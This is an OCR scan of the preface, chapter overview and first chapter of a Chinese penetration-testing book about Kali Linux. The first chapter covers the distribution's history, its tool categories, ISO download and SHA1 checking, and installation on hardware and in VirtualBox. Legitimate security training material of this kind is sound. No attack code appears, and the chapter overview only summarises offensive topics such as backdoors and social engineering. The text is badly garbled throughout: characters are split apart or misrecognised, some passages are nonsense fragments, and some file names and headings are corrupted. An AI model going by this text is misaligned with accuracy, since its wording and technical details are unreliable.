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bu 半日 mE 


Kali Linux 是 一 个 渗透 测试 兼 安全 审计 和 平台， 集成 了 多 款 漏洞 检 
测 、 目 标识 别 和 漏洞 利用 工具 ， 在 信息 安全 业界 有 着 广泛 的 用 途 。 

本 书 从 业务 角度 出 发 ， 通 过 真实 攻击 案例 并 辅 之 以 各 种 实用 的 黑客 
工具 ， 探 讨 了 进行 渗透 测试 所 需 的 各 种 准备 工序 和 操作 流程 。 本 书 共 分 
为 12 章 ， 其 内 容 涵 盖 了 Kali Linux 的 使 用 、 渗 透 测 试 方法 论 、 收 集 评 估 
项 目 需 求 的 标准 流程 、 信 息 收 集 阶段 的 工作 流程 、 在 目标 环境 中 探测 终 
端 设 备 的 方法 、 服 务 枚 举 及 用 途 、 漏 洞 映 射 、 社 会 工程 学 、 漏 洞 利用 、 
提升 权限 、 操 作 系统 后 门 和 Web 后 文 的 相关 技术 、 渗 透 测 试 文档 报告 的 
BEES. 

Apis 
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是 刚 入 门 的 新 手 ， 都 会 在 本 书 中 找到 需要 的 知识 。 
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Kali Linux 是 一 个 渗透 测试 平台 兼 安全 审计 平台 ， 它 集成 了 多 和 亚 漏 
洞 检测 、 目 标识 别 和 漏洞 利用 工具 。 在 明确 业务 目标 的 情况 下 ， 测 试 人 
员 采 取 适 当 的 渗透 测试 方法 论 ， 结 合 详细 的 测试 计划 即 可 进行 富有 成 效 
的 渗透 测试 。 

本 书 循序 渐进 地 演示 了 多 款 尖 端的 黑客 工具 ， 连 贯 地 介绍 了 各 种 实 
用 的 黑客 技术 ， 是 一 本 系统 化 地 讲解 渗透 测试 技巧 的 图 书 。 它 从 业务 的 
角度 出 发 ， 以 时 下 数字 时 代 的 真实 攻击 案例 入 手 ， 探 讨 了 所 需 的 各 种 必 
要 的 准备 工序 和 测试 流程 。 

本 书 揭 示 了 渗透 测试 的 最 优 逻 辑 思 路 和 业内 最 佳 的 测试 方法 。 

本 书 最 先 讲解 了 实验 室 的 制备 方法 ， 依 次 说 明了 基本 的 安装 和 配置 
方法 ， 讨 论 了 渗透 测试 的 不 同类 型 ， 介 绍 了 开放 的 安全 测试 方法 ， 并 提 
出 了 Kali Linux 特有 的 测试 过 程 。 在 此 之 后 ， 本 书 将 遵循 正式 的 测试 方 
法 论 ， 依 据 渗透 测试 各 个 阶段 (范围 界定 、 信 息 收 集 、 目 标 发 现 、 服 务 
枚 举 、 漏 洞 映 射 、 社 会 工程 学 、 提 升 权 限 、 访 问 维护 和 文档 报告 ) 的 需 
要 介绍 相应 的 测试 工具 。 我 们 会 通过 真实 的 渗透 案例 来 演示 这 些 工具 的 
使 用 和 配置 方法 。 本 书 最 后 一 部 分 还 简要 介绍 了 额外 的 渗透 工具 以 及 渗 
透 测试 人 员 通 常会 参考 的 重要 资源 。 

本 书 从 零 起 步 介 绍 了 渗透 测试 的 必 备 技能 ， 可 作为 读者 专业 且 实 用 
的 专家 指导 。 在 学 习 本 书 的 内 容 之 后 ， 读 者 可 以 在 现实 环境 中 或 者 在 实 
验 测 试 平台 中 使 用 Kali Linux 进行 渗透 测试 。 

本 书 内 容 








第 1 章 ，Kali Linux 入 门 。 简要 介绍 Kali Linux 的 Live DVD 的 使 用 
方法 。 本 章 首先 介绍 Kali Linux 的 研发 简 史 和 各 类 工具 ， 然 后 介绍 获 
Hu. (FR. Hug. Kali Linux ”的 方法 ， 以 及 多 个 重要 网 络 服务 
(HTTP. MySQL. SSH) 的 配置 方法 。 最 后 ， 本 章 还 演示 了 使 用 镜像 
文件 安装 并 配置 一 台 漏 洞 百 出 的 问题 虚拟 机 ， 以 及 安装 额外 工具 包 的 方 
法 。 

第 2 章 ， 渗 透 测 斌 方法论。 ”探讨 了 标准 渗透 测试 的 基本 概念 、 规 
则 、 管 理 、 方 法 和 流程 。 本 章 将 介绍 两 种 著名 的 类 型 渗透 测试 ， 即 黑 盒 
测试 和 和 白 盒 测试 之 间 的 明显 区 别 。 另 外 ， 它 还 分 析 了 脆弱 性 评估 和 渗透 
测试 之 间 的 区 别 。 本 章 重 点 讲解 了 各 种 渗透 测试 方法 论 的 业务 特性 、 功 
能 和 优点 ， 分 别 讨 论 了 OSSTMM、ISSAF、OWASP 和 WASC-TC。 最 
后 ， 介 绍 了 由 10 个 连贯 的 测试 阶段 组 成 的 Kali Linux 的 通用 渗透 测试 流 
程 。 

第 3 章 ， 范 围 界定 。 阅 述 收集 评估 项 目 需求 的 标准 流程 。 本 章 将 痢 
述 制定 渗透 测试 项 目 工 作 路 线 图 所 需 的 各 个 要 素 。 这 个 阶段 的 工作 可 分 
为 多 个 关键 步骤 ， 即 收集 需求 、 筹 划 工 作 、 边 界 分 析 、 明 确 业 务 指标 、 
项 目 管理 和 统筹 调度 。 本 章 讲解 获取 测试 环境 具体 信息 的 方法 。 

第 4 章 ， 信 息 收 集 。 介绍 信息 收集 阶段 的 工作 流程 。 本 章 首先 演示 
了 通过 公共 资源 获取 目标 环境 有 关 信息 的 方法 ， 然 后 介绍 了 分 析 DNS 信 
四 和 收集 网 络 路 由 信息 的 手段 ， 最 后 讲解 了 利用 搜索 引擎 获取 目标 域 
名 、E-mail 地 址 和 文件 元 数据 的 技术 。 

第 5 章 ， 目 标识 别 。 讲解 了 在 被 测 环境 中 探索 终端 设备 的 方法 。 本 
章 介 绍 了 目标 识别 阶段 的 任务 以 及 相应 的 工具 ， 以 及 对 目标 主机 进行 操 
作 系 统 指纹 识别 的 各 种 工具 。 

第 6 章 ， 服 务 枚 举 。 探讨 了 服务 枚 举 及 其 用 途 。 本 章 介绍 了 端口 扫 
描 的 概念 和 相关 工具 。 本 章 重 点 介绍 Nmap 的 各 种 可 用 选项 ， 以 及 在 被 
测 网 络 中 搜索 SMB、SNMP 和 VPN 服 务 的 各 种 工具 。 























第 7 瘟 ， 漏 洞 映射 。 讨论 了 漏洞 的 两 种 类 型 : 本 地 漏洞 和 远程 漏 
洞 。 您 将 在 本 章 了 解 漏洞 区 分 依据 和 分 类 方法 ， 及 各 种 行业 标准 。 此 
外 ， 本 章 讲解 了 OpenVAS、Cisco、Fuzzing、SMB、SNMP 和 Web 应 用 
程序 分 析 工 具 ， 这 些 工具 可 以 用 来 查找、 分 析 目 标 网 络 种 存在 的 安全 漏 
洞 。 

第 8 章 ， 社 会 工程 学 攻击 。 介绍 了 社会 工程 学 专业 人 员 操 纵 他 人 ， 
使 后 者 泄露 信息 或 进行 某 种 行为 的 核心 原则 和 业内 认可 的 做 法 。 本 章 将 
前 述 社 工 涉 及 的 基本 心理 学 原理 。 社 会 工程 学 专业 人 士 制定 的 社工 目标 
和 具体 方法 都 是 基于 这 些 心理 学 原理 。 本 章 还 通过 实际 案例 讲解 了 社工 
的 攻击 流程 和 攻击 方法 。 本 章 最 后 介绍 了 Kali Linux 的 社会 工程 学 工具 
集 ， 并 演示 了 利用 这 些 工 具 攻 击 人 力 资源 部 门 的 社工 方法 。 

第 9 章 ， 漏 洞 利用 。 重点 介绍 了 可 切实 利用 漏洞 的 实践 方法 和 各 种 
工具 。 本 章 讲解 了 漏洞 研究 领域 的 各 个 方面 ， 以 及 理解 、 检 验 和 测试 目 
标 环境 脆弱 性 的 关键 手段 。 本 章 还 列举 了 一 些 知 名 的 漏洞 资料 库 和 使 用 
方法 。 同 时 ， 本 章 还 从 安全 评估 的 角度 讲解 了 和 恶名 昭 彩 的 开发 工具 包 ， 
并 演示 了 使 用 Metasploit 的 exploit 模 块 编写 简单 的 漏洞 利用 程序 的 方法 。 

第 10 章 ， 提 升 权 限 。 介绍 了 提升 权限 、 网 络 监听 及 网 络 欺骗 的 概 
念 。 本 草 不 仅 介 绍 了 通过 本 地 漏洞 提升 权限 的 方法 ， 而 且 介绍 了 分 别 以 
离线 和 在 线 的 方式 碰撞 用 户 密码 的 工具 。 本 章 最 后 还 讲解 了 可 用 于 网 络 
欺骗 和 网 络 监听 的 多 球 工 具 。 

Le, Vile Bey. 演示 了 操作 系统 后 门 和 Web 后 门 的 有 关 技 
术 。 本 章 介 绍 了 各 种 不 同 的 后 门 及 其 使 用 方法 。 此 外 ， 本 章 还 讲解 了 多 
款 网 络 隧道 工具 ， 这 些 工 具 可 以 在 攻击 者 和 受害 者 之 间 建 立 秘 密 通 信 。 

第 12 章 ， 文 档 报 告 。 涵盖 了 渗透 测试 文档 、 汇 报 文件 和 现场 演示 
的 有 关内 容 。 本 章 内 容 则 在 指导 读者 以 撰写 系统 化 的 、 结 构 化 的 、 一 致 
的 工程 文档 。 此 外 ， 本 章 还 介绍 了 验证 测试 结果 、 报 告 的 不 同 种 类 、 现 
场 演示 及 测试 的 后 期 流程 工作 。 





























附录 A， 辅 助 工 具 。 介绍 了 渗透 测试 工作 可 能 会 用 到 的 几 和 天 额外 工 





附录 B， 关 键 资 源 。 列举 了 多 个 可 帮助 您 提高 渗透 测试 技术 的 参考 

阅读 群体 

本 书 适 合 大 体 了 解 UNIX/Linux 操 作 系 统 ， 并 了 解 信 息 安 全 各 项 构成 
因素 的 全 安全 专业 人 士 或 网 络 管理 员 ， 以 及 想 要 使 用 Kali Linux 进行 渗 
透 测 试 的 恋 者 。 
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第 1 音 Kali Linux A |] 


本 章 将 带领 读者 初步 了 解 渗透 测试 专用 的 独立 Linux 操作 系统 一 一 
Kali Linux。 本 章 泣 新 下 述 主题 : 

e Kali 的 发 展 简 史 ; 

e Kali 的 一 般 用 途 ; 

e Kali 的 下 载 与 安装 ; 

e Kali 的 配置 与 更 新 。 

在 本 章 的 结尾 部 分 ， 我 们 还 会 介绍 Kali Linux 附加 功能 包 和 配置 工 





1.1 Kali] % Fi fai 


Kali Linux (Kali) 是 专门 用 于 渗透 测试 的 Linux 操 作 系 统 ， 它 由 
BackTrack 发 展 而 来 。 在 整合 了 IWHAX、WHOPPIX 和 Auditor 这 3 种 渗 
透 测试 专用 Live Linux 之 后 ，BackTrack 正 式 改 名 为 Kali Linux. 

BackTrack fH 4# 4 B) Linux 41 RAS. fEBackTrack2 Ati 4.070 Vi. 
版 的 时 候 ， 它 的 下 载 次 数 已 经 超过 了 400 万 次 。 

Kali Linux 1.0 版 于 2013 年 3 H12 日 问世 。 在 5 天 之 后 ， 官 方 为 修复 
USB 键盘 的 文 持 问题 而 发 布 了 1.0.1 版 。 在 这 短 短 的 5 AA, Kali 的 下 
载 次 数 就 超过 了 9 万 次 。 

根据 官网 的 介绍 (http://docs.kali.org/introduction/what-is-kali- 
linux) , Kali 的 主要 特色 有 : 

它 是 基于 Debian 的 Linux 发 行 版 ; 

* eee 多 个 渗透 测试 程序 ; 











e 它 文 持 绝 大 多 数 的 无 线 网 卡 ; 

e 它 修 改 了 内 核 以 支持 (无 线 ) 数据 包 注 入 ; 

e 所 有 的 软件 包 都 有 研发 团队 的 PGP 签名 ; 

e 用 户 可 以 自制 满足 各 自 需求 的 Kali Linux 发 行 版 ; 
e 支持 基于 ARM 的 硬件 系统 。 





1.2 Kali Linux 4, 
Kali Linux 含有 可 用 于 渗透 测试 的 各 种 工具 。 这 些 工具 程序 大 体 可 


以 分 为 以 下 儿 类 。 

e 信息 收集 : 这 类 工具 可 用 来 收集 目标 的 DNS、IDS/IPS、 网 络 扫 
描 、 操 作 系 统 、 路 由 、SSL、SMB、VPN、VoIP、SNMP 信 息 和 E-mail 
地 址 。 

e 漏洞 评估 : 这 类 工具 都 可 以 扫描 目标 系统 上 的 漏洞 。 部 分 工具 可 
以 检测 Cisco 网 络 系 统 缺 陷 ， 有 些 还 可 以 评估 各 种 数据 库 系统 的 安全 问 
题 。 很 多 模糊 测试 软件 都 属于 漏洞 评估 工具 。 

e Web 应 用 : 即 与 Web 应 用 有 关 的 工具 。 它 包括 CMS (NARHA 
统 ) 扫描 器 、 数 据 库 漏洞 利用 程序 、Web 应 用 模糊 测试 、Web 应 用 代 
理 、Web 疏 虫 及 web 漏洞 扫描 器 。 

e 密码 攻击 : 无 论 是 在 线 攻击 还 是 离线 破解 ， 只 要 是 能 够 实施 密码 
攻击 的 工具 都 属于 密码 攻击 类 工具 。 

e 漏洞 利用 : 这 类 工具 可 以 利用 在 目标 系统 中 发 现 的 漏洞 。 攻 击 网 
络 、Web 和 数据 库 漏洞 的 软件 ， 都 属于 漏洞 利用 (exploitation) TH. 
Kali 中 的 某 些 软件 可 以 针对 漏洞 情况 进行 社会 工程 学 攻击 。 

e 网 络 监听 : 这 类 工具 用 于 监听 网 络 和 Web 流量 。 网 络 监 听 需 要 进 
行 网 络 欺骗 ， 所 以 Ettercap 和 Yersinia 这 类 软件 也 归于 这 类 软件 。 

e 访问 维护 : 这 类 工具 帮助 渗透 人 员 维 持 他 们 对 目标 主机 的 访问 























权 。 某 些 情况 下 ， 渗 透 人 员 必 须 先 获取 主机 的 最 高 权限 才能 安装 这 类 软 
件 。 这 类 软件 包括 用 于 在 Web 应 用 和 操作 系统 安装 后 门 的 程序 ， 以 及 隧 


道 类 工具 。 
e 报告 工具 : 如 果 您 需要 撰写 渗透 测试 的 报告 文件 ， 您 应 该 用 得 上 
这 些 软件 。 


e 系统 服务 : 这 是 渗透 人 员 在 渗透 测试 时 可 能 用 到 的 常见 服务 类 软 
件 ， 它 包括 Apache 服 务 、MySQL 服 务 、SSH 服 务 和 Metasploit 服 务 。 

为 了 降低 渗透 测试 人 员 筛 选 工具 的 难度 ，Kali Linux 单独 划分 了 一 
类 软件 一 一 Top 10 Security Tools， 即 10 大 首选 安全 工具 。 这 10 大 工具 


分 别 是 aircrack-ng、burp-suite、hydra、john、maltego、metasploit、 








nmap. sqlmap、wireshark 各 zaproxy。 

除了 可 用 于 渗透 测试 的 各 种 工具 以 外 ，Kali Linux 还 整合 了 以 下 几 
RLR, 

e 无 线 攻 击 : 可 攻击 蓝牙 、RFID/NFC 和 其 他 无 线 设备 的 工具 。 

e 逆 问 工程 : 可 用 于 调试 程序 或 反 汇 编 的 工具 。 

e JAMA: 用 于 各 类 压力 测试 的 工具 集 。 它 们 可 测试 网 络 、 无 
线 、Web 和 VoIP 系统 的 负载 能 

e 便 件 破解 : 用 于 调试 Android 和 Arduino 程序 的 工具 。 

e 法 证 调查 : 即 电 子 取证 的 工具 。 它 的 各 种 工具 可 以 用 于 制作 人 硬盘 
磁盘 镜像 、 文 件 分 析 、 硬 盘 镜 像 分 析 。 如 需 使 用 这 类 程序 ， 首 先 要 在 局 
动 菜 单 里 选择 Kali Linux Forensics | No Drives or Swap Mount。 在 开局 这 
个 选项 以 后 ，Kali Linux 不 会 自动 加 载 硬 盘 驱 动 器 ， 以 保护 硬盘 数据 的 
完整 性 。 

本 书 仅 介绍 Kali Linux 的 渗透 测试 工具 。 


1.3 下 载 Kali Linux 














要 安装 使 用 Kali Linux， 首 先 需 要 下 载 它 。 下 载 Kali Linux 的 官方 网 
站 是 http://www. kali.org/downloads/。 

在 下 载 页 面 中 《〈 见 图 1.1) ， 您 可 以 通过 下 列 项 目 选择 适用 的 Kali 
Linux 镜像 。 


www.kali.org/dow 





Downloads 


(Keli 1.0 s) 


Cmn a) (omes) (Cm — le) (ISO 加 [De 加 
1 











amd64 
armel kalti-linux-1.0.1-4386.1$0 
armhf 
4165050t8709e60163741532aa3ee2e89f80f13e83 
| 2288 
| Download Kali | 


e 主机 架构 : 1386. amd64. armel 或 armhf。 

e 镜像 类 型 : ISO 或 VMware 镜像 。 

如 果 您 想 要 把 镜像 烧 录 为 DVD 光盘 ， 或 者 在 主机 上 安装 Kali 
Linux， 就 需要 下 载 ISO 镜 像 。 但 是 如 需 在 VMware 里 使 用 Kali Linux, E 
接 下 载 VMware 镜像 ， 然 后 再 在 虚拟 机 环境 里 安装 和 配置 Kali 系 统 更 为 


方便 。 

在 下 载 镜 像 文 件 之 后 ， 您 需要 校 验 镜像 文件 的 SHAL 哈 希 值 是 否 和 
下 载 网 站 上 提示 的 哈 希 值 一 致 。 检 查 SHA1 哈 希 值 主要 为 了 确保 下 载 镜 
像 文 件 的 完整 性 。 这 步 工 作 可 以 使 您 免 受 文件 下 载 不 完整 而 带 来 的 灾 
难 ， 也 可 验证 文件 是 否 用 被 他 人 蓄意 复 改 。 

在 UNIX/Linux/BSD 操 作 系 统 中 ， 您 可 以 直接 使 用 shalsum 命 令 检查 
下 载 文件 的 哈 希 值 。 因 为 镜像 文件 很 大 ， 所 以 计算 哈 希 值 的 时 间 可 能 较 
长 。 例 如 ， 您 可 以 使 用 下 述 指令 检查 kali-linux-1.0.1-i386.iso 文 件 的 哈 希 
值 : 

shalsum kali-linux-1.0.1-1386.iso 

41e5050f8709e6cd6a7d1baaa3ee2e89f8dfae83 kali-linux-1.0.1-1386.iso 

很 多 Windows 程 序 都 可 以 生成 SHA1 的 哈 希 值 。 我 们 推荐 读者 使 用 
shalsum， 它 可 在 下 述 网 址 下 载 : 
http://www.ring.gr.jp/pub/net/gnupg/binary/shalsum.exe. 

shalsum 短 小 实用 。 如 果 您 想 要 尝试 其 他 程序 ， 可 考虑 
HashMyFiles (http://www. nirsoft.net/utils/hash_my_files.html) 。 
HashMyFiles 能 够 计算 MD5、SHA1、CRC32、SHA-256、SHA-384 和 
SHA-512 算 法 的 哈 希 值 。 

下 载 HashMyFiles 之 后 ， 打 开 这 个 程序 ， 在 沫 单 里 选择 File | Add 
Files 或 直接 按 快 捷 键 F2， 则 可 添加 需要 计算 哈 希 值 的 文件 。 

使 用 HashMyFiles 计算 Kali Linux i386 ISO 镜像 的 哈 希 值 ， 情 况 会 如 
图 1.2 所 示 。 














D www.kali.org/downloads/ 


Download your flavour of Kali Linux 





Filename | kali-knux-1.0. 1-386 iso 
shaisum | 41e5050f8709e6cd6a7d1baaa3ee2e89f3dfae83 
Size (MB) [2285 








图 1.2 
在 使 用 shalsum、HashMyFile 这 类 工具 计算 下 载 文件 的 哈 希 值 之 
后 ， 您 需要 将 其 与 网 页 所 示 的 哈 希 值 进行 比较 ， 检 查 它 们 是 否 相 同 。 
如 果 两 个 值 相同 ， 那 您 可 直接 进入 下 市 的 操作 。 如 果 两 个 值 不 相 
同 ， 那 么 就 说 明 您 下 载 的 文件 有 问题 ， 您 可 能 需要 在 官方 的 镜像 下 载 网 
站 重新 下 载 有 关 文 件 。 





1.4 使 用 Kali Linux 


Kali Linux 有 以 下 几 种 使 用 方式 : 

e 可 以 直接 通过 Live DVD 运行 Kali Linux; 

e 可 以 在 人 硬盘 上 安装 并 运行 Kali Linux; 

e 可 以 在 USB 磁盘 上 安装 Kali Linux〈 即 portable Kali Linux) 。 
后 续 几 个 小 节 将 简要 介绍 这 几 种 安装 方式 。 


1.4.1 Live DVD 方式 


如 果 您 想 要 跳 过 安装 过 程 直接 使 用 Kali Linux， 您 可 以 把 ISO 镜像 
录制 在 DVD 光盘 上 。 制 备 好 光盘 以 后 ， 就 可 以 直接 通过 DVD 光盘 启动 
Kali。 当 然 ， 您 需要 事先 设置 好 BIOS， 使 其 从 光驱 启动 操作 系统 ， 

通过 Live DVD 的 方式 启动 Kali Linux， 最 大 的 优点 就 是 安装 速度 快 
且 易 用 性 较 好 。 

PÆRE, Live DVD 的 方式 有 几 个 不 可 避免 的 局 限 。 例 如 ， 在 重 
新 启动 系统 之 后 ， 设 置 好 的 文件 和 配置 都 会 丢失 。 另 外 ， 因 为 DVD 6 
盘 的 读 写 速度 比 人 硬盘 的 速度 慢 很 多 ， 以 DVD 光盘 的 方式 运行 Kali Linux 
系统 ， 其 运行 速度 远 远 不 如 在 硬盘 上 安装 的 Kali Linux 系 统 。 

我 们 推荐 仅 在 测试 的 情况 下 以 Live DVD ”的 运行 方式 运行 Kali 
Linux。 如 果 您 需要 在 日 党 工作 里 使 用 Kali Linux， 我 们 推荐 您 首先 安 闭 
Kali Linux， 然 后 再 使 用 它 。 

















1.4.2 便 租 安装 


便 舟 安装 Kali Linux 的 方式 分 为 以 下 两 种 : 

e 安装 在 物理 机 /真实 主机 上 CHALE) ; 

e 安装 在 虚拟 机 上 。 

通常 我 们 会 把 Kali Linux 安装 在 虚拟 机 上 。 

1. 安装 在 物理 主机 上 

在 物理 (真实 ) 主机 上 安装 Kali Linux 之 前 ， 请 务必 确认 整个 硬盘 
是 空 磁盘 。 即 使 您 的 硬盘 上 有 数据 ， 在 以 人 硬盘 方式 安装 Kali 系 统 时 ， 安 
装 程序 (默认 选项 ) 将 会 把 整个 硬盘 格式 化 。 要 想 轻 松 安 装 这 个 系统 ， 
最 好 把 整个 硬盘 都 分 配给 Kali 使 用 。 如 果 您 的 主机 已 经 装 有 其 他 操作 系 
统 ， 则 需要 划分 出 一 个 单独 的 分 区 给 Kali Linux。 总 之 ， 在 有 数据 的 硬 
盘 上 安装 Kali Linux 时 应 当 格 外 小 心 ， 以 免 破 坏 原 有 数据 。 

Kali Linux 官方 网 站 介绍 了 在 Windows 操 作 系统 的 主机 上 安装 Kali 
Linux 的 具体 方法 。 如 需 查 询 ， 请 访问 下 述 网 址 : 


http://docs.kali.org/installation/dual- boot-kali-with-windows. 
人 硬盘 分 区 工具 有 很 多 。 就 开源 工具 而 言 ， 可 选择 的 Linux Live CD 
f: 


e SystemRescueCD (http://www.sysresccd.org/) ; 








e GParted Live (http://gparted.sourceforge.net/livecd.php) ; 

e Kali Linux Chttp://www.kali.org) o 

上 述 Linux Live CD 的 使 用 方法 很 简单 ， 从 光盘 局 动 操作 系统 就 可 以 
管理 磁盘 分 区 。 在 使 用 Linux Live CD 的 磁盘 分 区 工具 之 前 ， 建 议 您 事先 
备份 好 硬盘 上 的 重要 数据 。 虽 然 我 们 认为 上 述 工 具 都 安全 可 笔 ， 没 遇 到 
过 事故 ， 但 是 小 心 驶 得 万 年 船 ， 如 果 人 硬盘 上 有 重要 数据 最 好 还 是 事先 备 
1 

在 您 划分 好 相应 分 区 ， 或 者 决定 使 用 整个 硬盘 安装 系统 时 ， 就 可 以 
从 Kali Linux Live DVD 启动 ， 然 后 从 启动 菜单 中 选择 Install 或 者 
Graphical install. 

从 光盘 系统 之 后 ， 您 就 会 看 到 安装 界面 〈 见 图 1.3) . EKRE 
中 ， 需 要 设置 的 几 个 地 方 如 下 所 示 。 

1 需要 在 安装 过 程 中 设置 系统 语言 。 默 认 系统 语言 是 英文 。 

2. 通过 下 拉 选 项 设置 国 别 。 

3. 设置 区 域 选 项 〈localesetting) 。 默 认 情 况 下 ， 地 区 为 
UnitedStates， 编 码 集 是 en_US.UTF-8。 

4. 您 需要 设置 键盘 布局 (keymap) 。 通 常情 况 下 ， 设 置 美 式 键 盘 
(American English) WEA VA f. 














IN 其 


Boot menu 
ve (b0b-pae) 
ve (60b-pae failsafe) 
ve (forensic mode) 
Install 
Graphical install 


Advanced options 


Press ENTER to boot or TAB to edit a menu entry 
图 1.3 
安装 程序 会 询问 您 主机 名 称 、 域 名 等 网 络 配 置 。 
安装 程序 会 在 下 一 步 提 示 您 设置 root 密 码 。 
安装 程序 接 下 来 帮 您 设置 时 区 。 
.在 便 盘 分 区 阶段 ， 安 装 程序 会 进行 磁盘 分 区 。 如 果 您 使 用 的 硬 
盘 没 有 数据 ， 则 可 选用 use entire disk 选项 。 如 果 您 dis 
机 安装 有 其 他 操作 系统 ， 您 可 能 首先 分 配 分 区 给 Kali Linux EH, 
需要 选择 菜单 中 的 Manual AE 安装 程序 会 根据 您 
的 选择 创建 相应 的 分 区 。 
9. 安装 程序 会 询问 您 采取 何 种 分 区 方案 。 默 认 情 况 下 ，Kali 会 推 

1$ e a pie 即 把 所 有 文件 写 在 一 个 分 区 里 。 考 虑 到 日 后 可 

能 重新 安装 系统 ， 通 常 需要 保留 home 文 件 夹 里 的 文件 ， 选 择 
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Separate/home ”partition 会 更 好 。 之 后 ， 您 要 根据 自己 的 需要 设置 /home 
分 区 的 大 小 。 如 果 要 把 所 有 文件 都 放 在 home 目录 (分 区 ) 里 ， 您 可 能 
需要 把 分 区 大 小 设置 得 大 一 些 〈 大 于 50GB) 。 一 般 而 言 ， 把 这 个 分 区 
的 大 小 设置 为 10GB 到 20GB 就 可 以 了 。 

10. 安装 程序 会 总 结 您 的 分 区 设置 ， 如 图 1.4 所 示 。 在 您 确认 之 
后 ， 它 才 会 真正 地 进行 分 区 管理 操作 。 

11. 接 下 来 ， 安 装 程 序 开 始 安装 Kali Linux 系统 。 这 个 过 程 可 能 会 
比较 长 ， 不 过 此 后 您 就 把 Kali Linux 安装 在 硬盘 上 了 。 在 我 们 的 测试 环 
境 下 ， 整 个 安装 过 程 耗 时 20 分 钟 左右 。 










Partition disks 


if you continue, the changes listed below will be written to the disks. Otherwise, you will be able to make 
further changes manually. 


The partition tables of the following devices are changed: 
SC511 (0,0,0) (sda) 


The following partitions are going to be formatted: 
partition #1 of SCSI1 (0,0,0) (sda) as ext4 
partition #5 of SCSI1 (0,0,0) (sda) as swap 


Wnte the changes to disks? 
No 





* Yes 


图 1.4 
12. 完成 上 述 安 装 过 程 之 后 ， 安 装 程序 会 提示 您 配置 软件 包 ， 然 后 
询问 您 是 否 把 GRUB AJEET) 安装 到 主 引 导 记 录 MBR 里 。 在 
设置 两 个 选项 时 ， 采 用 默认 的 设置 不 会 有 什么 问题 。 请 注意 ， 如 果 您 的 
主机 上 安装 有 其 他 操作 系统 ， 您 可 能 不 应 当 在 MBR 上 安装 GRUB。 
13. 如 果 您 看 到 如 图 1.5 所 示 的 信息 ， 那 么 您 的 主机 已 经 成 功 安装 
了 Kali 系 统 。 





Finish the installation 


Installabon complete 
Installation is complete, so it is time to boot into your new system. Make sure to remove the 


installation media (CD-ROM, floppies), so that you boot into the new system rather than 
restarting the installation. 


Screenshot Go Back Continue 


图 1.5 
14. 选择 Continue 就 会 重新 启动 计算 机 ， 测 试 刚刚 安装 好 的 Kali 系 
统 。 在 重新 局 动 计算 机 之 后 ， 您 将 看 到 Kali 的 登录 界面 〈 见 图 1.6) 。 


b 

















kali 
Other 
Username: 
System Default v Cancel Log In 








图 1.6 








15， 现 在， 输入 您 在 安装 过 程 中 指定 的 用 户 名 和 密码 就 可 以 使 用 


Kali 系 统 了 。 

2. 安装 在 虚拟 机 上 

您 也 可 以 在 虚拟 机 系统 里 安装 Kali ”Linux。 采 用 这 种 方式 安装 Kali 
Linux 系统， 无 须 单 独 准备 物理 人 硬盘 〈 或 分 区 ) ， 也 不 会 影响 主机 上 已 
有 的 操作 系统 。 

本 文 使 用 VirtualBox Chttp://www.virtualbox.org) 虚拟 机 系统 。 
VirtualBox 是 开放 源 代 码 的 虚拟 化 软件 ， 文 持 Windows、Linux、OS X 和 
Solaris 操 作 系 统 。 

在 虚拟 机 里 运行 Kali Linux， 比 在 物理 机 上 运行 的 Kali Linux 系统 的 
性 能 差 

我 们 既 可 以 通过 ISO 镜像 在 虚拟 机 里 安装 Kali Linux 系统 ， 也 可 以 
直接 下 载 VMware 厂 盘 镜像 直接 加 载 Kali Linux 系统 。 采 用 前 面 一 种 方 
法 的 安装 时 间 较 长 ， 但 是 可 以 更 为 详细 地 调整 Kali 的 设置 。 

在 虚拟 机 里 使 用 ISO 镜像 安装 Kali 

在 虚拟 机 里 通过 ISO 镜像 安装 Kali Linux 的 详细 步骤 如 下 。 

1. 在 VirtualBox 的 工具 栏 里 选择 New， 创 建 一 个 新 的 虚拟 机 。 

2. 设置 虚拟 机 的 名 称 和 操作 系统 类 型 。 本 例 中 ， 我 们 设置 VM 的 
名 称 为 Kali Linuxz， 并 选择 操作 系统 为 Linux 一 Debian 〈 见 图 1.7) 。 

3. 分 配 虚 拟 机 的 内 存 。 内 存 分 配 的 越 多 ， 虚 拟 机 的 性 能 也 就 越 
好 。 本 例 中 ， 我 们 分 配给 Kali Linux 的 虚拟 机 2048MB AE CLA 
1.8) 。 请 注意 ， 您 不 可 能 把 主机 所 有 内 存 都 分 配给 虚拟 机 使 用 ， 因 为 
您 主机 的 操作 系统 也 要 使 用 内 存 。 


Name and operating system 


Please choose a descriptive name for the new virtual machine and select the 
type of operating system you intend to instal on &. The name you choose 
wil be used throughout VirtualBox to identify this machine. 

Name: Kal Linux 

Toe: uns 
verson: Deban 7.7 Y] 





Memory size 


rr 
virtual machine 


The recommended memory sze 5 384 MB. 


pum 





图 1.8 
4. 设置 虚拟 机 的 硬盘 。 您 可 以 设置 虚拟 硬盘 文件 的 类 型 为 VDI。 
这 种 格式 的 虚拟 硬盘 文件 可 以 动态 调整 文件 大 小 。 我 们 推荐 您 分 配给 虚 
拟 机 32GB 以 上 的 虚拟 硬盘 〈 见 图 1.9) 。 如 果 您 日 后 需要 安装 软件 ， 就 
需要 把 虚拟 硬盘 设置 得 更 大 一 些 。 


File location and size 


Please type the name of the new virtual hard drive file into the box below or click on 
the folder icon to select a different folder to create the file in. 


D:\VMs\Pentest\Kal Linux|Kall Linux.vdi a 


Select the sze of the virtual hard drive n megabytes. This sze is the imt on the 
amount of fle data that a vrtual machine wil be able to store on the hard drive. 


9— — I 32 b8 


2,00 TB 








图 1.9 
5. 完成 上 述 步 又 之 后 ， 虚 拟 机 清单 里 会 列 出 刚才 新 建 的 虚拟 机 。 
6. 如 需 通 过 Kali Linux 的 ISO 镜像 安装 系统 ， 要 在 VirtualBox 荣 单 里 
选中 那个 虚拟 机 ， 然 后 点 击 Storage 菜 单 进 行 配 置 〈 见 图 1.10) 。 





Kali (Testing 
[ebx 


Q nte 








Kali Linux 
(C (^ Powered Off 


© Display 


Video Memory: 12 MB 
Remote Desktop Server: Disabled 


“|| Q Storage 
Controller: IDE 
IDE Secondary Master: [CD/DVD] Empty 
Controller: SATA 
SATA Port 0: 
(9 Audio 
Host Driver: Windows DirectSound 
Controler: ICH AC97 
| SP Network 
Adapter 1: Intel PRO/1000 MT Desktop (NAT) 
| (9 usB 
Device Fitters: 0 (0 active) 
| QJ Shared folders 
None 


| O description 


Kali Linux.vdi (Normal, 32,00 GB) 





None 


图 1.10 


